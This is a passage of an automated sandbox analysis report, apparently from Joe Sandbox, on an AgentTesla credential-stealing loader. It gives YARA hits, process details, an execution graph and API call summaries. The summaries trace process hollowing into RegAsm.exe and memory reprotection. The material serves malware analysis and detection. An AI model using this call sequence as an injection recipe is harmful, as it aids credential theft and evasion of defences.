                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000003.1331489547.0000000000752000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1339579263.0000000004092000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1339579263.0000000004092000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1312498270.0000000000756000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000003.1312498270.0000000000756000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1312446439.0000000000733000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000003.1312446439.0000000000733000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1331618036.0000000000756000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000003.1331618036.0000000000756000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 7
Start time: 10:05:02
Start date: 05/11/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Imagebase: 0x230000
File size: 65'440 bytes
MD5 hash: 0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 10:05:02
Start date: 05/11/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Imagebase: 0xb90000
File size: 65'440 bytes
MD5 hash: 0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2538240236.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2538240236.0000000002F64000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2536620293.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2536620293.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2538240236.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2538240236.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false

                                                                    Execution Graph

Execution Coverage: 22%
Dynamic/Decrypted Code Coverage: 9.4%
Signature Coverage: 6.5%
Total number of Nodes: 551
Total number of Limit Nodes: 67
3526->3527 3528 54e678 __vbaFreeObj 3526->3528 3530 54e6ce 3527->3530 3528->3321 3531 54e6f3 3530->3531 3532 54e6d9 __vbaHresultCheckObj 3530->3532 3533 54e6fa __vbaAryUnlock 3531->3533 3532->3533 3601 54e4f3 __vbaChkstk #717 __vbaVarMove 3533->3601 3537 54e40d 3536->3537 3538 54e418 __vbaHresultCheckObj 3537->3538 3539 54e42f 3537->3539 3538->3539 3540 54e442 __vbaFreeObj 3539->3540 3541 54e444 #526 __vbaStrVarMove __vbaStrMove __vbaFreeVar #644 3539->3541 3540->3334 3543 54e48e 3541->3543 3543->3540 3544 54e499 __vbaHresultCheckObj 3543->3544 3544->3540 3546 54d730 3545->3546 3547 54d75e 3546->3547 3548 54d748 __vbaNew2 3546->3548 3549 54d786 __vbaHresultCheckObj 3547->3549 3550 54d79d 3547->3550 3548->3547 3551 54d7a1 __vbaStrToAnsi 3549->3551 3550->3551 3603 40a760 3551->3603 3553 54d7bd __vbaSetSystemError __vbaFreeStrList 3554 54d7f2 3553->3554 3555 54da03 3553->3555 3556 54d80e 3554->3556 3557 54d7f8 __vbaNew2 3554->3557 3558 40a6b0 155 API calls 3555->3558 3562 54d836 __vbaHresultCheckObj 3556->3562 3563 54d84d 3556->3563 3557->3556 3559 54da18 __vbaSetSystemError __vbaLenBstr __vbaStrToAnsi 3558->3559 3560 40a8a0 155 API calls 3559->3560 3561 54da3d __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 3560->3561 3564 40a5b0 155 API calls 3561->3564 3565 54d851 __vbaStrToAnsi 3562->3565 3563->3565 3566 54da7e __vbaSetSystemError __vbaAryLock 3564->3566 3567 40a760 155 API calls 3565->3567 3568 40a630 155 API calls 3566->3568 3569 54d86d __vbaSetSystemError __vbaFreeStrList 3567->3569 3570 54dab7 __vbaSetSystemError __vbaAryUnlock __vbaRedimPreserve 3568->3570 3569->3555 3571 54d8a2 3569->3571 3588 54d9fe __vbaFreeObj __vbaFreeStr 3570->3588 3572 54d8be 3571->3572 3573 54d8a8 __vbaNew2 3571->3573 3575 54d8e6 __vbaHresultCheckObj 3572->3575 3576 54d8fd 3572->3576 3573->3572 3577 54d901 __vbaStrToAnsi 3575->3577 3576->3577 3578 40a760 155 API calls 3577->3578 3579 54d91d __vbaSetSystemError __vbaFreeStrList 3578->3579 3579->3555 3580 54d952 3579->3580 3581 
54d96e 3580->3581 3582 54d958 __vbaNew2 3580->3582 3583 54d996 __vbaHresultCheckObj 3581->3583 3584 54d9ad 3581->3584 3582->3581 3585 54d9b1 __vbaStrToAnsi 3583->3585 3584->3585 3586 40a760 155 API calls 3585->3586 3587 54d9cd __vbaSetSystemError __vbaFreeStrList 3586->3587 3587->3555 3587->3588 3588->3354 3590 54d44c 3589->3590 3591 54d4ce __vbaAryLock #644 __vbaAryUnlock #644 3589->3591 3751 54d38a __vbaChkstk __vbaRefVarAry __vbaUbound __vbaVarMove 3590->3751 3745 54ac32 3591->3745 3595 54d516 __vbaRedim __vbaAryLock __vbaAryLock 3746 40a820 3595->3746 3597 54d582 __vbaSetSystemError __vbaAryUnlock __vbaAryUnlock __vbaVarMove __vbaVarTstEq 3597->3595 3598 54d5e8 7 API calls 3597->3598 3599 54d67d 3598->3599 3600 54d6b2 __vbaFreeVar __vbaAryDestruct 3599->3600 3600->3356 3602 54e55e __vbaVarMove 3601->3602 3602->3528 3604 40a769 3603->3604 3608 54b8e6 __vbaChkstk #644 3604->3608 3605 40a777 3607 54b8e6 155 API calls 3605->3607 3607->3605 3631 54ac32 3608->3631 3610 54b92f #644 3632 54ac32 3610->3632 3612 54b957 #644 3633 54ee42 11 API calls 3612->3633 3614 54b96e __vbaChkstk 3669 54bc0e __vbaChkstk __vbaVarDup 3614->3669 3616 54b997 __vbaStrVarMove __vbaStrMove __vbaFreeVar __vbaChkstk 3617 54bc0e 11 API calls 3616->3617 3618 54b9dc __vbaStrVarMove __vbaStrMove __vbaFreeVar 3617->3618 3619 54ba24 3618->3619 3620 54ba0e __vbaNew2 3618->3620 3621 54ba85 3619->3621 3622 54ba6e __vbaHresultCheckObj 3619->3622 3620->3619 3623 54ba89 __vbaFreeVar #644 #644 3621->3623 3622->3623 3676 54e785 14 API calls 3623->3676 3625 54bab4 #644 3626 54ee42 56 API calls 3625->3626 3627 54badf 3626->3627 3714 54bb2d __vbaChkstk 3627->3714 3629 54bae8 __vbaFreeVar 3630 54bb00 __vbaFreeStr __vbaFreeObj __vbaFreeStr 3629->3630 3630->3605 3631->3610 3632->3612 3636 54ef01 3633->3636 3634 54ef74 __vbaObjSetAddref #644 __vbaFreeObj #644 3722 54ac32 3634->3722 3635 54ef30 __vbaAryLock #644 __vbaAryUnlock 3635->3636 3636->3634 3636->3635 3638 54efa8 __vbaAryLock #644 __vbaAryUnlock #644 3723 
54ac32 3638->3723 3640 54eff4 __vbaRedim #644 3724 54ac32 3640->3724 3642 54f041 #644 3725 54ac32 3642->3725 3644 54f067 __vbaAryLock __vbaStrCat __vbaStrMove __vbaI4Str VirtualProtect 3645 54f0cf __vbaHresultCheckObj 3644->3645 3646 54f0eb 3644->3646 3647 54f0ef 7 API calls 3645->3647 3646->3647 3726 54ac32 3647->3726 3649 54f155 __vbaFreeStr __vbaFreeVar 3652 54f172 3649->3652 3650 54f194 __vbaAryLock #644 __vbaAryUnlock 3650->3652 3651 54f1d9 #644 3727 54ac4f 3651->3727 3652->3650 3652->3651 3654 54f1fd #644 3728 54ac4f 3654->3728 3656 54f221 #644 3729 54ac4f 3656->3729 3658 54f245 #644 3730 54ac4f 3658->3730 3660 54f269 #644 3731 54ac4f 3660->3731 3662 54f28d VirtualProtect 3663 54f2e5 __vbaHresultCheckObj 3662->3663 3667 54f304 3662->3667 3663->3667 3664 54f37f #644 3666 54f396 3664->3666 3665 54f33a __vbaAryLock #644 __vbaAryUnlock 3665->3667 3668 54f3c9 __vbaAryDestruct __vbaAryDestruct 3666->3668 3667->3664 3667->3665 3668->3614 3670 54bc47 #644 __vbaI4Var 3669->3670 3671 54bc62 3670->3671 3672 54bce7 __vbaVarAdd __vbaVarMove 3671->3672 3673 54bca4 #697 __vbaVarCat __vbaVarMove __vbaFreeVar 3671->3673 3674 54bca2 __vbaFreeVar 3671->3674 3672->3670 3673->3671 3674->3616 3679 54e851 3676->3679 3677 54e8c4 __vbaObjSetAddref #644 __vbaFreeObj #644 3732 54ac32 3677->3732 3678 54e880 __vbaAryLock #644 __vbaAryUnlock 3678->3679 3679->3677 3679->3678 3681 54e8f3 __vbaAryLock #644 __vbaAryUnlock #644 3682 54e93f 3681->3682 3733 54ae5b __vbaRedim 3682->3733 3684 54e95c #644 3734 54ac32 3684->3734 3686 54e97d #644 3735 54ac32 3686->3735 3688 54e9a5 __vbaAryLock __vbaStrCat __vbaStrMove __vbaI4Str VirtualProtect 3689 54ea04 __vbaHresultCheckObj 3688->3689 3690 54ea1b 3688->3690 3691 54ea1f 7 API calls 3689->3691 3690->3691 3736 54ac32 3691->3736 3693 54ea8d __vbaFreeStr __vbaFreeVar 3696 54eaac 3693->3696 3694 54eb16 #644 3737 54ac32 3694->3737 3695 54eace __vbaAryLock #644 __vbaAryUnlock 3695->3696 3696->3694 3696->3695 3698 54eb38 #644 3738 54ac32 3698->3738 3700 
54eb5a #644 3739 54ac32 3700->3739 3702 54eb7c #644 3740 54ac32 3702->3740 3704 54eb9e #644 3741 54ac32 3704->3741 3706 54ebbd #644 #644 3707 54ec18 3706->3707 3708 54ec23 __vbaHresultCheckObj 3707->3708 3712 54ec3a 3707->3712 3708->3712 3709 54ecb7 #644 3711 54ecce 3709->3711 3710 54ec6f __vbaAryLock #644 __vbaAryUnlock 3710->3712 3713 54ecf7 __vbaAryDestruct __vbaFreeObj 3711->3713 3712->3709 3712->3710 3713->3625 3742 54c16a __vbaChkstk 3714->3742 3716 54bb64 #644 #644 3743 54ac32 3716->3743 3718 54bb91 #644 3744 54ac4f 3718->3744 3720 54bbb7 #644 3721 54bbdf 3720->3721 3721->3629 3722->3638 3723->3640 3724->3642 3725->3644 3726->3649 3727->3654 3728->3656 3729->3658 3730->3660 3731->3662 3732->3681 3733->3684 3734->3686 3735->3688 3736->3693 3737->3698 3738->3700 3739->3702 3740->3704 3741->3706 3742->3716 3743->3718 3744->3720 3745->3595 3747 40a829 3746->3747 3749 54b8e6 155 API calls 3747->3749 3748 40a837 3750 54b8e6 155 API calls 3748->3750 3749->3748 3750->3748 3752 54d3ed __vbaVarAdd __vbaVarSub __vbaI4Var __vbaFreeVarList 3751->3752 3752->3591 3753->3427 3754->3433 3755->3432 3757 54a7e8 3756->3757 3757->3431 3759 54bdc1 __vbaFreeVar #644 3758->3759 3760 40a5f0 3759->3760 3761 40a5f9 3760->3761 3763 40a56d 3762->3763 3763->3763 3765 40aa25 3764->3765 3765->3765 3767 40a969 3766->3767 3769 54c62d 3768->3769 3769->3476 3771 40a539 3770->3771 3772->3499 3773->3501 3774->3503 3776 54c20a __vbaAryLock #644 __vbaAryUnlock 3775->3776 3777 54ac41 3776->3777 3778 54ac49 __vbaI4Var 3777->3778 3779 57c3a9 3778->3779 3780 2272b06 3781 2272b17 3780->3781 3800 22730d7 GetPEB 3781->3800 3783 2272b46 3784 2272fcb 3783->3784 3785 22730d7 GetPEB 3783->3785 3786 2272b61 3785->3786 3786->3784 3787 2272ccd NtCreateSection 3786->3787 3787->3784 3788 2272d04 NtMapViewOfSection 3787->3788 3788->3784 3789 2272d2c 3788->3789 3790 2272e8f GetPEB 3789->3790 3793 2272dca 3789->3793 3790->3793 3791 2272eb2 CreateProcessW 3791->3784 3792 2272ed5 NtGetContextThread 3791->3792 
3792->3793 3794 2272ef6 NtReadVirtualMemory 3792->3794 3793->3791 3795 2272fbc NtTerminateProcess 3793->3795 3794->3793 3796 2272f1c NtWriteVirtualMemory 3794->3796 3795->3793 3796->3793 3797 2272f42 NtUnmapViewOfSection NtMapViewOfSection 3796->3797 3797->3793 3798 2272f76 NtSetContextThread 3797->3798 3798->3793 3799 2272fa7 NtResumeThread 3798->3799 3799->3784 3799->3793 3801 22730ec 3800->3801 3801->3783 3802 54ad9f __vbaChkstk 3803 54ade9 3802->3803 3811 57c3b4 __vbaChkstk 3803->3811 3807 54ae13 3858 57c415 __vbaChkstk 3807->3858 3862 54a57f 3811->3862 3814 54af1d 11 API calls 3873 54ed1f __vbaChkstk __vbaVarDup #653 __vbaI4Var __vbaFreeVar 3814->3873 3816 54afe7 11 API calls 3817 54ed1f 10 API calls 3816->3817 3818 54b089 45 API calls 3817->3818 3821 54b2dc 3818->3821 3819 54b317 __vbaAryLock #644 __vbaAryUnlock 3819->3821 3820 54b361 __vbaObjSetAddref #644 __vbaFreeObj #644 3878 54ac4f 3820->3878 3821->3819 3821->3820 3823 54b3a6 __vbaAryLock #644 __vbaAryUnlock #644 3879 54ac32 3823->3879 3825 54b404 __vbaRedim #644 3880 54ac32 3825->3880 3827 54b454 #644 3881 54ac32 3827->3881 3829 54b488 __vbaAryLock __vbaStrCat __vbaStrMove __vbaI4Str VirtualProtect 3830 54b4fd __vbaHresultCheckObj 3829->3830 3831 54b51e 3829->3831 3832 54b525 __vbaAryUnlock __vbaFreeStr #644 3830->3832 3831->3832 3835 54b55d 3832->3835 3833 54b5e8 #644 3882 54ac32 3833->3882 3834 54b59a __vbaAryLock #644 __vbaAryUnlock 3834->3835 3835->3833 3835->3834 3837 54b616 #644 3883 54ac32 3837->3883 3839 54b644 #644 3884 54ac32 3839->3884 3841 54b672 #644 3885 54ac32 3841->3885 3843 54b6a0 #644 3886 54ac32 3843->3886 3845 54b6ce VirtualProtect 3846 54b731 __vbaHresultCheckObj 3845->3846 3849 54b752 3845->3849 3846->3849 3847 54b7e4 #644 3887 54ac32 3847->3887 3848 54b796 __vbaAryLock #644 __vbaAryUnlock 3848->3849 3849->3847 3849->3848 3851 54b806 #644 3888 54ac32 3851->3888 3853 54b81d #644 3854 54b840 3853->3854 3855 54bb2d 6 API calls 3854->3855 3856 54b849 __vbaFreeVar 3855->3856 3857 54b8cb 
__vbaAryDestruct 3856->3857 3857->3807 3889 40a920 3858->3889 3863 54a5a1 3862->3863 3871 54ab35 GetPEB 3863->3871 3865 54a5ab 3866 54a600 NtAllocateVirtualMemory 3865->3866 3867 54a623 NtProtectVirtualMemory 3865->3867 3866->3867 3868 54a61e __vbaFreeVar 3866->3868 3867->3868 3870 54a64e 3867->3870 3868->3814 3869 54a6e7 NtProtectVirtualMemory 3869->3868 3870->3869 3872 54ab47 3871->3872 3872->3865 3874 54ed89 3873->3874 3875 54ed9a #632 __vbaVarCat __vbaVarMove __vbaFreeVarList 3874->3875 3876 54edeb __vbaFreeVar 3874->3876 3875->3874 3876->3816 3878->3823 3879->3825 3880->3827 3881->3829 3882->3837 3883->3839 3884->3841 3885->3843 3886->3845 3887->3851 3888->3853 3890 40a929 3889->3890 3892 54b8e6 155 API calls 3890->3892 3891 40a937 3893 54b8e6 155 API calls 3891->3893 3892->3891 3893->3891

                                                                    Control-flow Graph

                                                                    [Figure: control-flow graph for the code starting at 2272b06; legend: Executed / Not Executed]
                                                                    APIs
                                                                    • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 02272CF2
                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 02272D1F
                                                                    • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02272ECA
                                                                    • NtGetContextThread.NTDLL(?,?), ref: 02272EE9
                                                                    • NtReadVirtualMemory.NTDLL(?,?,?,000001D8,?), ref: 02272F0F
                                                                    • NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 02272F39
                                                                    • NtUnmapViewOfSection.NTDLL(?,?), ref: 02272F54
                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 02272F6D
                                                                    • NtSetContextThread.NTDLL(?,00010003), ref: 02272F9E
                                                                    • NtResumeThread.NTDLL(?,00000000), ref: 02272FAB
                                                                    • NtTerminateProcess.NTDLL(?,00000000), ref: 02272FC0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1339450583.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2270000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: Section$ThreadView$ContextCreateMemoryProcessVirtual$ReadResumeTerminateUnmapWrite
                                                                    • String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
                                                                    • API String ID: 1528524012-1087957892
                                                                    • Opcode ID: bdfd8c2c08da80d8aef1ac999a3557cfaab083761e6134d184dbc6d082490619
                                                                    • Instruction ID: bcc731b665bc34dc9f5e59819ee4afb0fdab247b20d834b0364fc7b1f2a7b7e0
                                                                    • Opcode Fuzzy Hash: bdfd8c2c08da80d8aef1ac999a3557cfaab083761e6134d184dbc6d082490619
                                                                    • Instruction Fuzzy Hash: A9E1F4B6D1425AEFDF11DFE4CC80AAEBBB9FF08304F14456AE914A6204D7309A85CF65

                                                                    Control-flow Graph

                                                                    [Figure: control-flow graph for the code starting at 2272b02; legend: Executed / Not Executed]
                                                                    APIs
                                                                    • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 02272CF2
                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 02272D1F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1339450583.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2270000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: Section$CreateView
                                                                    • String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
                                                                    • API String ID: 1585966358-1087957892
                                                                    • Opcode ID: 3eb31ec99a85193f88e70bbcecc521051a1f23482346dadfbb56db0986e45181
                                                                    • Instruction ID: 811d4db7022ee3d586aff35962620cd19205f944d679e01c1a4d4e043ba82f7f
                                                                    • Opcode Fuzzy Hash: 3eb31ec99a85193f88e70bbcecc521051a1f23482346dadfbb56db0986e45181
                                                                    • Instruction Fuzzy Hash: 7DD105B6D1425AEFDF11DFE4CC80AADBBB9FF08304F14456AE914A6204D7309A85CF65

                                                                    Control-flow Graph

                                                                    [Figure: control-flow graph for the code starting at 2272af7; legend: Executed / Not Executed]
                                                                    APIs
                                                                    • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 02272CF2
                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 02272D1F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1339450583.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2270000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: Section$CreateView
                                                                    • String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
                                                                    • API String ID: 1585966358-1087957892
                                                                    • Opcode ID: 45bab2479b9087538b20e70b587c0bc8a8ce5d1d9e37fd1158cd0eb1a472643f
                                                                    • Instruction ID: 58ac8b5e578c83a5ebf68048d9f5e5f9780746304992e19c6842d2f4b46db7cd
                                                                    • Opcode Fuzzy Hash: 45bab2479b9087538b20e70b587c0bc8a8ce5d1d9e37fd1158cd0eb1a472643f
                                                                    • Instruction Fuzzy Hash: 49D126B6D1425AEFDF21DFE4CC80AADBBB9FF04304F14456AE914A6244DB309A85CF61

                                                                    Control-flow Graph

                                                                    [Figure: control-flow graph for the code starting at 54a57f; legend: Executed / Not Executed]
                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(000000FF,00000100,00000000,00000100,00003000,00000040,?,NtQueryInformationProcess,005492E3,?,NtQueryInformationProcess,005492FD,?,NtQueryInformationProcess,005492CC,NtQueryInformationProcess), ref: 0054A616
                                                                    • NtProtectVirtualMemory.NTDLL(000000FF,?,00000005,00000040,?,?,NtQueryInformationProcess,005492E3,?,NtQueryInformationProcess,005492FD,?,NtQueryInformationProcess,005492CC,NtQueryInformationProcess,0054936E), ref: 0054A641
                                                                    • NtProtectVirtualMemory.NTDLL(000000FF,?,00000005,?,?,?,NtQueryInformationProcess,005492E3,?,NtQueryInformationProcess,005492FD,?,NtQueryInformationProcess,005492CC,NtQueryInformationProcess,0054936E), ref: 0054A73D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryVirtual$Protect$Allocate
                                                                    • String ID: NtQueryInformationProcess
                                                                    • API String ID: 955180148-2781105232
                                                                    • Opcode ID: a46659d6b1fd8026fead420b3ff8e7ecdc993c7e1b4199977ab1582f957eb704
                                                                    • Instruction ID: e22a33d9078bf96c33f2217001f6ef94492cd397031fa740021f4d4d55df372c
                                                                    • Opcode Fuzzy Hash: a46659d6b1fd8026fead420b3ff8e7ecdc993c7e1b4199977ab1582f957eb704
                                                                    • Instruction Fuzzy Hash: A751057194020AAFDB50DFA4CC45AEFBFB6FB94318F188315E115A62D2D37059449B63

                                                                    Control-flow Graph

                                                                    [Figure: control-flow graph of the function starting at 54af1d; blocks are marked Executed or Not Executed]
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00000000,00401006,?,?,?,0054AE13,?,?,?,?,?,00401006), ref: 0054AF3A
                                                                    • __vbaStrCat.MSVBVM60(0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13,?), ref: 0054AF56
                                                                    • __vbaStrMove.MSVBVM60(0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13,?), ref: 0054AF60
                                                                    • __vbaStrCat.MSVBVM60(bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13,?), ref: 0054AF6B
                                                                    • __vbaStrMove.MSVBVM60(bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13,?), ref: 0054AF75
                                                                    • __vbaStrCat.MSVBVM60(0040A1F0,00000000,bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13,?), ref: 0054AF80
                                                                    • __vbaStrMove.MSVBVM60(0040A1F0,00000000,bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13,?), ref: 0054AF8A
                                                                    • #644.MSVBVM60(00000000,0040A1F0,00000000,bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000,00401006,?,?,?,0054AE13), ref: 0054AF90
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,0040A1F0,00000000,bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000,00401006), ref: 0054AF96
                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,00401006,00000000,00000000,00000000,0040A1F0,00000000,bvm,00000000,0040A1D8,0040A1D0,?,?,?,00000000), ref: 0054AFAE
                                                                    • __vbaChkstk.MSVBVM60 ref: 0054AFCD
                                                                      • Part of subcall function 0054ED1F: __vbaChkstk.MSVBVM60(?,00401006), ref: 0054ED3B
                                                                      • Part of subcall function 0054ED1F: __vbaVarDup.MSVBVM60(?,00000008,?,?,00401006), ref: 0054ED53
                                                                      • Part of subcall function 0054ED1F: #653.MSVBVM60(?,?,?,00000008,?,?,00401006), ref: 0054ED60
                                                                      • Part of subcall function 0054ED1F: __vbaI4Var.MSVBVM60(?,?,?,?,00000008,?,?,00401006), ref: 0054ED69
                                                                      • Part of subcall function 0054ED1F: __vbaFreeVar.MSVBVM60 ref: 0054ED82
                                                                      • Part of subcall function 0054ED1F: #632.MSVBVM60(?,?,00000001,00000002), ref: 0054EDB7
                                                                      • Part of subcall function 0054ED1F: __vbaVarCat.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054EDC8
                                                                      • Part of subcall function 0054ED1F: __vbaVarMove.MSVBVM60(?,?,?,?,?,00000001,00000002), ref: 0054EDD2
                                                                      • Part of subcall function 0054ED1F: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,?,?,?,00000001,00000002), ref: 0054EDE1
                                                                      • Part of subcall function 0054ED1F: __vbaFreeVar.MSVBVM60(0054EE24), ref: 0054EE1E
                                                                    • __vbaStrVarVal.MSVBVM60(?,?,?), ref: 0054AFEF
                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?), ref: 0054AFF9
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0054B005
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,?,?), ref: 0054B019
                                                                    • __vbaFreeVar.MSVBVM60 ref: 0054B024
                                                                    • __vbaStrCat.MSVBVM60(0040A208,0040A1FC), ref: 0054B033
                                                                    • __vbaStrMove.MSVBVM60(0040A208,0040A1FC), ref: 0054B03D
                                                                    • __vbaStrCat.MSVBVM60(0040A218,00000000,0040A208,0040A1FC), ref: 0054B048
                                                                    • __vbaStrMove.MSVBVM60(0040A218,00000000,0040A208,0040A1FC), ref: 0054B052
                                                                    • __vbaStrCat.MSVBVM60(0040A22C,00000000,0040A218,00000000,0040A208,0040A1FC), ref: 0054B05D
                                                                    • __vbaChkstk.MSVBVM60 ref: 0054B06F
                                                                    • __vbaStrVarVal.MSVBVM60(00000000,?,?), ref: 0054B094
                                                                    • #644.MSVBVM60(00000000,00000000,?,?), ref: 0054B09A
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,?), ref: 0054B0A0
                                                                    • __vbaFreeStrList.MSVBVM60(00000003,00000000,0040A218,00000000,00000000,00000000,00000000,?,?), ref: 0054B0B8
                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,0040A218,00000000,0040A208,0040A1FC), ref: 0054B0CD
                                                                    • __vbaStrCat.MSVBVM60(0040A240,0040A238,?,?,?,0040A218,00000000,0040A208,0040A1FC), ref: 0054B0DF
                                                                    • __vbaStrMove.MSVBVM60(0040A240,0040A238,?,?,?,0040A218,00000000,0040A208,0040A1FC), ref: 0054B0E9
                                                                    • __vbaStrCat.MSVBVM60(0040A248,00000000,0040A240,0040A238,?,?,?,0040A218,00000000,0040A208,0040A1FC), ref: 0054B0F4
                                                                    • __vbaStrMove.MSVBVM60(0040A248,00000000,0040A240,0040A238,?,?,?,0040A218,00000000,0040A208,0040A1FC), ref: 0054B0FE
